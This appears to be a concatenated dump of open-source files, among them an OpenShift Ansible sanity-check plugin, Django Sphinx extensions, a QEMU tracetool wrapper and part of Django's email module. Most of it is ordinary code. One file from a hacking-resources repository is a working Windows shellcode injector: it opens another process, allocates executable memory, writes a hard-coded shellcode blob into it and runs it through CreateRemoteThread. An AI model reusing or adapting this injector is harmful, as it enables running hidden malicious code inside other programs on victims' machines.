def decode(self, input, final=False):
return quopri_decode(input, self.errors)[0]
class StreamWriter(Codec, codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
# encodings module API
def getregentry():
return codecs.CodecInfo(
name='quopri',
encode=quopri_encode,
decode=quopri_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
| apache-2.0 |
twiest/openshift-tools | openshift/installer/vendored/openshift-ansible-3.8.36-1/roles/lib_utils/action_plugins/sanity_checks.py | 4 | 8160 | """
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')
# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
('openshift_use_flannel', False),
('openshift_use_nuage', False),
('openshift_use_contiv', False),
('openshift_use_calico', False))
ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#.#[-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+\\.\\d+(-[\\w\\-\\.]*)?$)',
'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
'openshift-enterprise': ENTERPRISE_TAG_REGEX}
CONTAINERIZED_NO_TAG_ERROR_MSG = """To install a containerized Origin release,
you must set openshift_release or openshift_image_tag in your inventory to
specify which version of the OpenShift component images to use.
(Suggestion: add openshift_release="x.y" to inventory.)"""
def to_bool(var_to_check):
"""Determine a boolean value given the multiple
ways bools can be specified in ansible."""
# http://yaml.org/type/bool.html
yes_list = (True, 1, "True", "1", "true", "TRUE",
"Yes", "yes", "Y", "y", "YES",
"on", "ON", "On")
return var_to_check in yes_list
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
"""Retrieve a variable from hostvars and template it.
If undefined, return None type."""
res = hostvars[host].get(varname)
if res is None:
return None
return self._templar.template(res)
def check_openshift_deployment_type(self, hostvars, host):
"""Ensure a valid openshift_deployment_type is set"""
openshift_deployment_type = self.template_var(hostvars, host,
'openshift_deployment_type')
if openshift_deployment_type not in VALID_DEPLOYMENT_TYPES:
type_strings = ", ".join(VALID_DEPLOYMENT_TYPES)
msg = "openshift_deployment_type must be defined and one of {}".format(type_strings)
raise errors.AnsibleModuleError(msg)
return openshift_deployment_type
def check_python_version(self, hostvars, host, distro):
"""Ensure python version is 3 for Fedora and python 2 for others"""
ansible_python = self.template_var(hostvars, host, 'ansible_python')
if distro == "Fedora":
if ansible_python['version']['major'] != 3:
msg = "openshift-ansible requires Python 3 for {};".format(distro)
msg += " For information on enabling Python 3 with Ansible,"
msg += " see https://docs.ansible.com/ansible/python_3_support.html"
raise errors.AnsibleModuleError(msg)
else:
if ansible_python['version']['major'] != 2:
msg = "openshift-ansible requires Python 2 for {};".format(distro)
def check_image_tag_format(self, hostvars, host, openshift_deployment_type):
"""Ensure openshift_image_tag is formatted correctly"""
openshift_image_tag = self.template_var(hostvars, host, 'openshift_image_tag')
if not openshift_image_tag or openshift_image_tag == 'latest':
return None
regex_to_match = IMAGE_TAG_REGEX[openshift_deployment_type]['re']
res = re.match(regex_to_match, str(openshift_image_tag))
if res is None:
msg = IMAGE_TAG_REGEX[openshift_deployment_type]['error_msg']
msg = msg.format(str(openshift_image_tag))
raise errors.AnsibleModuleError(msg)
def no_origin_image_version(self, hostvars, host, openshift_deployment_type):
"""Ensure we can determine what image version to use with origin
fail when:
- openshift_is_containerized
- openshift_deployment_type == 'origin'
- openshift_release is not defined
- openshift_image_tag is not defined"""
if not openshift_deployment_type == 'origin':
return None
oic = self.template_var(hostvars, host, 'openshift_is_containerized')
if not to_bool(oic):
return None
orelease = self.template_var(hostvars, host, 'openshift_release')
oitag = self.template_var(hostvars, host, 'openshift_image_tag')
if not orelease and not oitag:
raise errors.AnsibleModuleError(CONTAINERIZED_NO_TAG_ERROR_MSG)
def network_plugin_check(self, hostvars, host):
"""Ensure only one type of network plugin is enabled"""
res = []
# Loop through each possible network plugin boolean, determine the
# actual boolean value, and append results into a list.
for plugin, default_val in NET_PLUGIN_LIST:
res_temp = self.template_var(hostvars, host, plugin)
if res_temp is None:
res_temp = default_val
res.append(to_bool(res_temp))
if sum(res) != 1:
plugin_str = list(zip([x[0] for x in NET_PLUGIN_LIST], res))
msg = "Host Checked: {} Only one of must be true. Found: {}".format(host, plugin_str)
raise errors.AnsibleModuleError(msg)
def check_hostname_vars(self, hostvars, host):
"""Checks to ensure openshift_hostname
and openshift_public_hostname
conform to the proper length of 63 characters or less"""
for varname in ('openshift_public_hostname', 'openshift_hostname'):
var_value = self.template_var(hostvars, host, varname)
if var_value and len(var_value) > 63:
msg = '{} must be 63 characters or less'.format(varname)
raise errors.AnsibleModuleError(msg)
def run_checks(self, hostvars, host):
"""Execute the hostvars validations against host"""
distro = self.template_var(hostvars, host, 'ansible_distribution')
odt = self.check_openshift_deployment_type(hostvars, host)
self.check_python_version(hostvars, host, distro)
self.check_image_tag_format(hostvars, host, odt)
self.no_origin_image_version(hostvars, host, odt)
self.network_plugin_check(hostvars, host)
self.check_hostname_vars(hostvars, host)
def run(self, tmp=None, task_vars=None):
result = super(ActionModule, self).run(tmp, task_vars)
# self.task_vars holds all in-scope variables.
# Ignore settting self.task_vars outside of init.
# pylint: disable=W0201
self.task_vars = task_vars or {}
# self._task.args holds task parameters.
# check_hosts is a parameter to this plugin, and should provide
# a list of hosts.
check_hosts = self._task.args.get('check_hosts')
if not check_hosts:
msg = "check_hosts is required"
raise errors.AnsibleModuleError(msg)
# We need to access each host's variables
hostvars = self.task_vars.get('hostvars')
if not hostvars:
msg = hostvars
raise errors.AnsibleModuleError(msg)
# We loop through each host in the provided list check_hosts
for host in check_hosts:
self.run_checks(hostvars, host)
result["changed"] = False
result["failed"] = False
result["msg"] = "Sanity Checks passed"
return result
| apache-2.0 |
zhoulingjun/django | docs/_ext/djangodocs.py | 321 | 12049 | """
Sphinx plugins for Django documentation.
"""
import json
import os
import re
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx import __version__ as sphinx_ver, addnodes
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.util.compat import Directive
from sphinx.util.console import bold
from sphinx.util.nodes import set_source_info
from sphinx.writers.html import SmartyPantsHTMLTranslator
# RE for option descriptions without a '--' prefix
simple_option_desc_re = re.compile(
r'([-_a-zA-Z0-9]+)(\s*.*?)(?=,\s+(?:/|-|--)|$)')
def setup(app):
app.add_crossref_type(
directivename="setting",
rolename="setting",
indextemplate="pair: %s; setting",
)
app.add_crossref_type(
directivename="templatetag",
rolename="ttag",
indextemplate="pair: %s; template tag"
)
app.add_crossref_type(
directivename="templatefilter",
rolename="tfilter",
indextemplate="pair: %s; template filter"
)
app.add_crossref_type(
directivename="fieldlookup",
rolename="lookup",
indextemplate="pair: %s; field lookup type",
)
app.add_description_unit(
directivename="django-admin",
rolename="djadmin",
indextemplate="pair: %s; django-admin command",
parse_node=parse_django_admin_node,
)
app.add_description_unit(
directivename="django-admin-option",
rolename="djadminopt",
indextemplate="pair: %s; django-admin command-line option",
parse_node=parse_django_adminopt_node,
)
app.add_config_value('django_next_version', '0.0', True)
app.add_directive('versionadded', VersionDirective)
app.add_directive('versionchanged', VersionDirective)
app.add_builder(DjangoStandaloneHTMLBuilder)
# register the snippet directive
app.add_directive('snippet', SnippetWithFilename)
# register a node for snippet directive so that the xml parser
# knows how to handle the enter/exit parsing event
app.add_node(snippet_with_filename,
html=(visit_snippet, depart_snippet_literal),
latex=(visit_snippet_latex, depart_snippet_latex),
man=(visit_snippet_literal, depart_snippet_literal),
text=(visit_snippet_literal, depart_snippet_literal),
texinfo=(visit_snippet_literal, depart_snippet_literal))
class snippet_with_filename(nodes.literal_block):
"""
Subclass the literal_block to override the visit/depart event handlers
"""
pass
def visit_snippet_literal(self, node):
"""
default literal block handler
"""
self.visit_literal_block(node)
def depart_snippet_literal(self, node):
"""
default literal block handler
"""
self.depart_literal_block(node)
def visit_snippet(self, node):
"""
HTML document generator visit handler
"""
lang = self.highlightlang
linenos = node.rawsource.count('\n') >= self.highlightlinenothreshold - 1
fname = node['filename']
highlight_args = node.get('highlight_args', {})
if 'language' in node:
# code-block directives
lang = node['language']
highlight_args['force'] = True
if 'linenos' in node:
linenos = node['linenos']
def warner(msg):
self.builder.warn(msg, (self.builder.current_docname, node.line))
highlighted = self.highlighter.highlight_block(node.rawsource, lang,
warn=warner,
linenos=linenos,
**highlight_args)
starttag = self.starttag(node, 'div', suffix='',
CLASS='highlight-%s' % lang)
self.body.append(starttag)
self.body.append('<div class="snippet-filename">%s</div>\n''' % (fname,))
self.body.append(highlighted)
self.body.append('</div>\n')
raise nodes.SkipNode
def visit_snippet_latex(self, node):
"""
Latex document generator visit handler
"""
self.verbatim = ''
def depart_snippet_latex(self, node):
"""
Latex document generator depart handler.
"""
code = self.verbatim.rstrip('\n')
lang = self.hlsettingstack[-1][0]
linenos = code.count('\n') >= self.hlsettingstack[-1][1] - 1
fname = node['filename']
highlight_args = node.get('highlight_args', {})
if 'language' in node:
# code-block directives
lang = node['language']
highlight_args['force'] = True
if 'linenos' in node:
linenos = node['linenos']
def warner(msg):
self.builder.warn(msg, (self.curfilestack[-1], node.line))
hlcode = self.highlighter.highlight_block(code, lang, warn=warner,
linenos=linenos,
**highlight_args)
self.body.append('\n{\\colorbox[rgb]{0.9,0.9,0.9}'
'{\\makebox[\\textwidth][l]'
'{\\small\\texttt{%s}}}}\n' % (fname,))
if self.table:
hlcode = hlcode.replace('\\begin{Verbatim}',
'\\begin{OriginalVerbatim}')
self.table.has_problematic = True
self.table.has_verbatim = True
hlcode = hlcode.rstrip()[:-14] # strip \end{Verbatim}
hlcode = hlcode.rstrip() + '\n'
self.body.append('\n' + hlcode + '\\end{%sVerbatim}\n' %
(self.table and 'Original' or ''))
self.verbatim = None
class SnippetWithFilename(Directive):
"""
The 'snippet' directive that allows to add the filename (optional)
of a code snippet in the document. This is modeled after CodeBlock.
"""
has_content = True
optional_arguments = 1
option_spec = {'filename': directives.unchanged_required}
def run(self):
code = '\n'.join(self.content)
literal = snippet_with_filename(code, code)
if self.arguments:
literal['language'] = self.arguments[0]
literal['filename'] = self.options['filename']
set_source_info(self, literal)
return [literal]
class VersionDirective(Directive):
has_content = True
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
option_spec = {}
def run(self):
if len(self.arguments) > 1:
msg = """Only one argument accepted for directive '{directive_name}::'.
Comments should be provided as content,
not as an extra argument.""".format(directive_name=self.name)
raise self.error(msg)
env = self.state.document.settings.env
ret = []
node = addnodes.versionmodified()
ret.append(node)
if self.arguments[0] == env.config.django_next_version:
node['version'] = "Development version"
else:
node['version'] = self.arguments[0]
node['type'] = self.name
if self.content:
self.state.nested_parse(self.content, self.content_offset, node)
env.note_versionchange(node['type'], node['version'], node, self.lineno)
return ret
class DjangoHTMLTranslator(SmartyPantsHTMLTranslator):
"""
Django-specific reST to HTML tweaks.
"""
# Don't use border=1, which docutils does by default.
def visit_table(self, node):
self.context.append(self.compact_p)
self.compact_p = True
self._table_row_index = 0 # Needed by Sphinx
self.body.append(self.starttag(node, 'table', CLASS='docutils'))
def depart_table(self, node):
self.compact_p = self.context.pop()
self.body.append('</table>\n')
def visit_desc_parameterlist(self, node):
self.body.append('(') # by default sphinx puts <big> around the "("
self.first_param = 1
self.optional_param_level = 0
self.param_separator = node.child_text_separator
self.required_params_left = sum([isinstance(c, addnodes.desc_parameter)
for c in node.children])
def depart_desc_parameterlist(self, node):
self.body.append(')')
if sphinx_ver < '1.0.8':
#
# Don't apply smartypants to literal blocks
#
def visit_literal_block(self, node):
self.no_smarty += 1
SmartyPantsHTMLTranslator.visit_literal_block(self, node)
def depart_literal_block(self, node):
SmartyPantsHTMLTranslator.depart_literal_block(self, node)
self.no_smarty -= 1
#
# Turn the "new in version" stuff (versionadded/versionchanged) into a
# better callout -- the Sphinx default is just a little span,
# which is a bit less obvious that I'd like.
#
# FIXME: these messages are all hardcoded in English. We need to change
# that to accommodate other language docs, but I can't work out how to make
# that work.
#
version_text = {
'versionchanged': 'Changed in Django %s',
'versionadded': 'New in Django %s',
}
def visit_versionmodified(self, node):
self.body.append(
self.starttag(node, 'div', CLASS=node['type'])
)
version_text = self.version_text.get(node['type'])
if version_text:
title = "%s%s" % (
version_text % node['version'],
":" if len(node) else "."
)
self.body.append('<span class="title">%s</span> ' % title)
def depart_versionmodified(self, node):
self.body.append("</div>\n")
# Give each section a unique ID -- nice for custom CSS hooks
def visit_section(self, node):
old_ids = node.get('ids', [])
node['ids'] = ['s-' + i for i in old_ids]
node['ids'].extend(old_ids)
SmartyPantsHTMLTranslator.visit_section(self, node)
node['ids'] = old_ids
def parse_django_admin_node(env, sig, signode):
command = sig.split(' ')[0]
env._django_curr_admin_command = command
title = "django-admin %s" % sig
signode += addnodes.desc_name(title, title)
return sig
def parse_django_adminopt_node(env, sig, signode):
"""A copy of sphinx.directives.CmdoptionDesc.parse_signature()"""
from sphinx.domains.std import option_desc_re
count = 0
firstname = ''
for m in option_desc_re.finditer(sig):
optname, args = m.groups()
if count:
signode += addnodes.desc_addname(', ', ', ')
signode += addnodes.desc_name(optname, optname)
signode += addnodes.desc_addname(args, args)
if not count:
firstname = optname
count += 1
if not count:
for m in simple_option_desc_re.finditer(sig):
optname, args = m.groups()
if count:
signode += addnodes.desc_addname(', ', ', ')
signode += addnodes.desc_name(optname, optname)
signode += addnodes.desc_addname(args, args)
if not count:
firstname = optname
count += 1
if not firstname:
raise ValueError
return firstname
class DjangoStandaloneHTMLBuilder(StandaloneHTMLBuilder):
"""
Subclass to add some extra things we need.
"""
name = 'djangohtml'
def finish(self):
super(DjangoStandaloneHTMLBuilder, self).finish()
self.info(bold("writing templatebuiltins.js..."))
xrefs = self.env.domaindata["std"]["objects"]
templatebuiltins = {
"ttags": [n for ((t, n), (l, a)) in xrefs.items()
if t == "templatetag" and l == "ref/templates/builtins"],
"tfilters": [n for ((t, n), (l, a)) in xrefs.items()
if t == "templatefilter" and l == "ref/templates/builtins"],
}
outfilename = os.path.join(self.outdir, "templatebuiltins.js")
with open(outfilename, 'w') as fp:
fp.write('var django_template_builtins = ')
json.dump(templatebuiltins, fp)
fp.write(';\n')
| bsd-3-clause |
bt3gl/My-Gray-Hacker-Resources | Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py | 4 | 2351 | # import ctypes to interact witht eh Windows API
from ctypes import *
# sets the section of memory that stores shellcode as RWX
page_rwx_value = 0x40
# all possible rights
process_all = 0x1F0FFF
# allocate memory, ensure it is zeroed for writting to memory
memcommit = 0x00001000
# stores the available calls from windll.kernel32
kernel32_variable = windll.kernel32
shellcode = "\xbb\xbb\x48\x30\x8d\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x47\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb4\xaa\xc5\x71\x22\xa8\x26\x8a\xb2\xcd\xaf\x6f\x83\xcd\xd4\xe4\xb3\xfd\x9f\xa9\x3f\x75\xcd\x59\xb4\xfb\xda\x6e\x7d\xb1\x3c\x40\x7e\xea\x7d\xc3\xfc\xf1\x51\x23\x3d\x3a\xa4\x22\x7a\x27\x45\x76\xd3\x23\xf8\x67\x50\x79\xc1\x0c\x2a\x6f\x41\xf0\xfa\x8e\x60\xa7\x71\xc9\xa2\x49\x56\x61\xeb\x51\xbb\x4c\xa5\xea\x0f\x3a\x34\x3b\x5e\xc3\x9b\x02\x6f\x36\xe5\x43\x57\xa9\x90\xbd\xa4\x54\xa3\x79\xd7\x82\x26\x9a\x7f\x40\x90\x46\x7e\x85\x47\x0c\x8c\x62\x03\x4a\x90\x75\xc0\xe0\xac\xfe\xe7\x26\x25\x44\xcc\xe2\x6e\x1e\x6d\xb2\xca\xf1\x92\xa4\xb5\xae\x36\xae\x5b\xba\x4a\xed\x33\x0f\x67\x0e\xc3\x07\xf0\x7d\xf1\x88\xaa\xe9\xb9\x41\x75\xed\xbe\x7b\xc1\x61\x41\x84\x32\xab\x85\xd0\x62\xc3\x2c\x59\xe9\x13\xd1\x8c\xbe\x43\x7d\x7f\x7f\x34\x3d\x2f\x17\x5e\xb2\x10\x07\x61\x19\x39\xa2\x9b\xc9\x86\x9b\x9b\x96\x6f\xde\xe3\x89\x8c\x57\x05\xa3\x42\x3e\x9d\x5b\xfa\x1b\x55\xfa\x03\xb6\x13\x3c\x8f\x35\xe3\xf2\x78\x33\xf7\x62\x89\x0e\xa5\x24\x96\xa4\xc0\xc8\x02\x43\x43\x9f\xba\x49\xb2\xd7\x64\xb1\x91\x6c\xac\x27\x5a\x1a\xd1\xa7\x5a\xda\x87\xad\x5a\xb2\x7f\x96\x08\xa7\x7f\x03\x3d\x74\xea\xac\x14\x29\xbd\xc4\x9a\x14\x89\x4a\x64\x73\x0b\xb6\xb3\xbd\x79\xd6\x07"
# process ID that the shellcode will be injected into
process_id = 1234
shellcode_length = len(shellcode)
# makes a call to OpenProcess
process_handle = kernel32_variable.OpenProcess(process_all, False, process_id)
# calls VirtualAllocEx, function that allocates memory in remote process
memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
# writes shellcode to the are of memory within the process
kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
# creates thread within the another process
kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0) | mit |
oritwas/qemu | scripts/tracetool.py | 111 | 3993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Command-line wrapper for the tracetool machinery.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
import sys
import getopt
from tracetool import error_write, out
import tracetool.backend
import tracetool.format
_SCRIPT = ""
def error_opt(msg = None):
if msg is not None:
error_write("Error: " + msg + "\n")
backend_descr = "\n".join([ " %-15s %s" % (n, d)
for n,d in tracetool.backend.get_list() ])
format_descr = "\n".join([ " %-15s %s" % (n, d)
for n,d in tracetool.format.get_list() ])
error_write("""\
Usage: %(script)s --format=<format> --backend=<backend> [<options>]
Backends:
%(backends)s
Formats:
%(formats)s
Options:
--help This help message.
--list-backends Print list of available backends.
--check-backend Check if the given backend is valid.
--binary <path> Full path to QEMU binary.
--target-type <type> QEMU emulator target type ('system' or 'user').
--target-arch <arch> QEMU emulator target arch.
--probe-prefix <prefix> Prefix for dtrace probe names
(default: qemu-<target-type>-<target-arch>).\
""" % {
"script" : _SCRIPT,
"backends" : backend_descr,
"formats" : format_descr,
})
if msg is None:
sys.exit(0)
else:
sys.exit(1)
def main(args):
global _SCRIPT
_SCRIPT = args[0]
long_opts = [ "backend=", "format=", "help", "list-backends", "check-backend" ]
long_opts += [ "binary=", "target-type=", "target-arch=", "probe-prefix=" ]
try:
opts, args = getopt.getopt(args[1:], "", long_opts)
except getopt.GetoptError, err:
error_opt(str(err))
check_backend = False
arg_backend = ""
arg_format = ""
binary = None
target_type = None
target_arch = None
probe_prefix = None
for opt, arg in opts:
if opt == "--help":
error_opt()
elif opt == "--backend":
arg_backend = arg
elif opt == "--format":
arg_format = arg
elif opt == "--list-backends":
backends = tracetool.backend.get_list()
out(", ".join([ b for b,_ in backends ]))
sys.exit(0)
elif opt == "--check-backend":
check_backend = True
elif opt == "--binary":
binary = arg
elif opt == '--target-type':
target_type = arg
elif opt == '--target-arch':
target_arch = arg
elif opt == '--probe-prefix':
probe_prefix = arg
else:
error_opt("unhandled option: %s" % opt)
if arg_backend is None:
error_opt("backend not set")
if check_backend:
if tracetool.backend.exists(arg_backend):
sys.exit(0)
else:
sys.exit(1)
if arg_format == "stap":
if binary is None:
error_opt("--binary is required for SystemTAP tapset generator")
if probe_prefix is None and target_type is None:
error_opt("--target-type is required for SystemTAP tapset generator")
if probe_prefix is None and target_arch is None:
error_opt("--target-arch is required for SystemTAP tapset generator")
if probe_prefix is None:
probe_prefix = ".".join([ "qemu", target_type, target_arch ])
try:
tracetool.generate(sys.stdin, arg_format, arg_backend,
binary = binary, probe_prefix = probe_prefix)
except tracetool.TracetoolError, e:
error_opt(str(e))
if __name__ == "__main__":
main(sys.argv)
| gpl-2.0 |
rebost/django | django/core/mail/message.py | 6 | 13093 | from __future__ import unicode_literals
import mimetypes
import os
import random
import time
from email import charset as Charset, encoders as Encoders
from email.generator import Generator
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.header import Header
from email.utils import formatdate, getaddresses, formataddr, parseaddr
from io import BytesIO
from django.conf import settings
from django.core.mail.utils import DNS_NAME
from django.utils.encoding import smart_str, force_unicode
# Don't BASE64-encode UTF-8 messages so that we avoid unwanted attention from
# some spam filters.
Charset.add_charset('utf-8', Charset.SHORTEST, None, 'utf-8')
# Default MIME type to use on attachments (if it is not explicitly given
# and cannot be guessed).
DEFAULT_ATTACHMENT_MIME_TYPE = 'application/octet-stream'
class BadHeaderError(ValueError):
pass
# Copied from Python standard library, with the following modifications:
# * Used cached hostname for performance.
# * Added try/except to support lack of getpid() in Jython (#5496).
def make_msgid(idstring=None):
"""Returns a string suitable for RFC 2822 compliant Message-ID, e.g:
<20020201195627.33539.96671@nightshade.la.mastaler.com>
Optional idstring if given is a string used to strengthen the
uniqueness of the message id.
"""
timeval = time.time()
utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(timeval))
try:
pid = os.getpid()
except AttributeError:
# No getpid() in Jython, for example.
pid = 1
randint = random.randrange(100000)
if idstring is None:
idstring = ''
else:
idstring = '.' + idstring
idhost = DNS_NAME
msgid = '<%s.%s.%s%s@%s>' % (utcdate, pid, randint, idstring, idhost)
return msgid
# Header names that contain structured address data (RFC #5322)
ADDRESS_HEADERS = set([
'from',
'sender',
'reply-to',
'to',
'cc',
'bcc',
'resent-from',
'resent-sender',
'resent-to',
'resent-cc',
'resent-bcc',
])
def forbid_multi_line_headers(name, val, encoding):
"""Forbids multi-line headers, to prevent header injection."""
encoding = encoding or settings.DEFAULT_CHARSET
val = force_unicode(val)
if '\n' in val or '\r' in val:
raise BadHeaderError("Header values can't contain newlines (got %r for header %r)" % (val, name))
try:
val = val.encode('ascii')
except UnicodeEncodeError:
if name.lower() in ADDRESS_HEADERS:
val = ', '.join(sanitize_address(addr, encoding)
for addr in getaddresses((val,)))
else:
val = str(Header(val, encoding))
else:
if name.lower() == 'subject':
val = Header(val)
return smart_str(name), val
def sanitize_address(addr, encoding):
if isinstance(addr, basestring):
addr = parseaddr(force_unicode(addr))
nm, addr = addr
nm = str(Header(nm, encoding))
try:
addr = addr.encode('ascii')
except UnicodeEncodeError: # IDN
if '@' in addr:
localpart, domain = addr.split('@', 1)
localpart = str(Header(localpart, encoding))
domain = domain.encode('idna')
addr = '@'.join([localpart, domain])
else:
addr = str(Header(addr, encoding))
return formataddr((nm, addr))
class SafeMIMEText(MIMEText):
def __init__(self, text, subtype, charset):
self.encoding = charset
MIMEText.__init__(self, text, subtype, charset)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEText.__setitem__(self, name, val)
def as_string(self, unixfrom=False):
"""Return the entire formatted message as a string.
Optional `unixfrom' when True, means include the Unix From_ envelope
header.
This overrides the default as_string() implementation to not mangle
lines that begin with 'From '. See bug #13433 for details.
"""
fp = BytesIO()
g = Generator(fp, mangle_from_ = False)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
class SafeMIMEMultipart(MIMEMultipart):
def __init__(self, _subtype='mixed', boundary=None, _subparts=None, encoding=None, **_params):
self.encoding = encoding
MIMEMultipart.__init__(self, _subtype, boundary, _subparts, **_params)
def __setitem__(self, name, val):
name, val = forbid_multi_line_headers(name, val, self.encoding)
MIMEMultipart.__setitem__(self, name, val)
def as_string(self, unixfrom=False):
"""Return the entire formatted message as a string.
Optional `unixfrom' when True, means include the Unix From_ envelope
header.
This overrides the default as_string() implementation to not mangle
lines that begin with 'From '. See bug #13433 for details.
"""
fp = BytesIO()
g = Generator(fp, mangle_from_ = False)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
class EmailMessage(object):
"""
A container for email information.
"""
content_subtype = 'plain'
mixed_subtype = 'mixed'
encoding = None # None => use settings default
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, cc=None):
"""
Initialize a single email message (which can be sent to multiple
recipients).
All strings used to create the message can be unicode strings
(or UTF-8 bytestrings). The SafeMIMEText class will handle any
necessary encoding conversions.
"""
if to:
assert not isinstance(to, basestring), '"to" argument must be a list or tuple'
self.to = list(to)
else:
self.to = []
if cc:
assert not isinstance(cc, basestring), '"cc" argument must be a list or tuple'
self.cc = list(cc)
else:
self.cc = []
if bcc:
assert not isinstance(bcc, basestring), '"bcc" argument must be a list or tuple'
self.bcc = list(bcc)
else:
self.bcc = []
self.from_email = from_email or settings.DEFAULT_FROM_EMAIL
self.subject = subject
self.body = body
self.attachments = attachments or []
self.extra_headers = headers or {}
self.connection = connection
def get_connection(self, fail_silently=False):
from django.core.mail import get_connection
if not self.connection:
self.connection = get_connection(fail_silently=fail_silently)
return self.connection
def message(self):
encoding = self.encoding or settings.DEFAULT_CHARSET
msg = SafeMIMEText(smart_str(self.body, encoding),
self.content_subtype, encoding)
msg = self._create_message(msg)
msg['Subject'] = self.subject
msg['From'] = self.extra_headers.get('From', self.from_email)
msg['To'] = self.extra_headers.get('To', ', '.join(self.to))
if self.cc:
msg['Cc'] = ', '.join(self.cc)
# Email header names are case-insensitive (RFC 2045), so we have to
# accommodate that when doing comparisons.
header_names = [key.lower() for key in self.extra_headers]
if 'date' not in header_names:
msg['Date'] = formatdate()
if 'message-id' not in header_names:
msg['Message-ID'] = make_msgid()
for name, value in self.extra_headers.items():
if name.lower() in ('from', 'to'): # From and To are already handled
continue
msg[name] = value
return msg
def recipients(self):
"""
Returns a list of all recipients of the email (includes direct
addressees as well as Cc and Bcc entries).
"""
return self.to + self.cc + self.bcc
def send(self, fail_silently=False):
"""Sends the email message."""
if not self.recipients():
# Don't bother creating the network connection if there's nobody to
# send to.
return 0
return self.get_connection(fail_silently).send_messages([self])
def attach(self, filename=None, content=None, mimetype=None):
"""
Attaches a file with the given filename and content. The filename can
be omitted and the mimetype is guessed, if not provided.
If the first parameter is a MIMEBase subclass it is inserted directly
into the resulting message attachments.
"""
if isinstance(filename, MIMEBase):
assert content == mimetype == None
self.attachments.append(filename)
else:
assert content is not None
self.attachments.append((filename, content, mimetype))
def attach_file(self, path, mimetype=None):
"""Attaches a file from the filesystem."""
filename = os.path.basename(path)
with open(path, 'rb') as f:
content = f.read()
self.attach(filename, content, mimetype)
def _create_message(self, msg):
return self._create_attachments(msg)
def _create_attachments(self, msg):
if self.attachments:
encoding = self.encoding or settings.DEFAULT_CHARSET
body_msg = msg
msg = SafeMIMEMultipart(_subtype=self.mixed_subtype, encoding=encoding)
if self.body:
msg.attach(body_msg)
for attachment in self.attachments:
if isinstance(attachment, MIMEBase):
msg.attach(attachment)
else:
msg.attach(self._create_attachment(*attachment))
return msg
def _create_mime_attachment(self, content, mimetype):
"""
Converts the content, mimetype pair into a MIME attachment object.
"""
basetype, subtype = mimetype.split('/', 1)
if basetype == 'text':
encoding = self.encoding or settings.DEFAULT_CHARSET
attachment = SafeMIMEText(smart_str(content, encoding), subtype, encoding)
else:
# Encode non-text attachments with base64.
attachment = MIMEBase(basetype, subtype)
attachment.set_payload(content)
Encoders.encode_base64(attachment)
return attachment
def _create_attachment(self, filename, content, mimetype=None):
"""
Converts the filename, content, mimetype triple into a MIME attachment
object.
"""
if mimetype is None:
mimetype, _ = mimetypes.guess_type(filename)
if mimetype is None:
mimetype = DEFAULT_ATTACHMENT_MIME_TYPE
attachment = self._create_mime_attachment(content, mimetype)
if filename:
try:
filename = filename.encode('ascii')
except UnicodeEncodeError:
filename = ('utf-8', '', filename.encode('utf-8'))
attachment.add_header('Content-Disposition', 'attachment',
filename=filename)
return attachment
class EmailMultiAlternatives(EmailMessage):
"""
A version of EmailMessage that makes it easy to send multipart/alternative
messages. For example, including text and HTML versions of the text is
made easier.
"""
alternative_subtype = 'alternative'
def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
connection=None, attachments=None, headers=None, alternatives=None,
cc=None):
"""
Initialize a single email message (which can be sent to multiple
recipients).
All strings used to create the message can be unicode strings (or UTF-8
bytestrings). The SafeMIMEText class will handle any necessary encoding
conversions.
"""
super(EmailMultiAlternatives, self).__init__(subject, body, from_email, to, bcc, connection, attachments, headers, cc)
self.alternatives = alternatives or []
def attach_alternative(self, content, mimetype):
"""Attach an alternative content representation."""
assert content is not None
assert mimetype is not None
self.alternatives.append((content, mimetype))
def _create_message(self, msg):
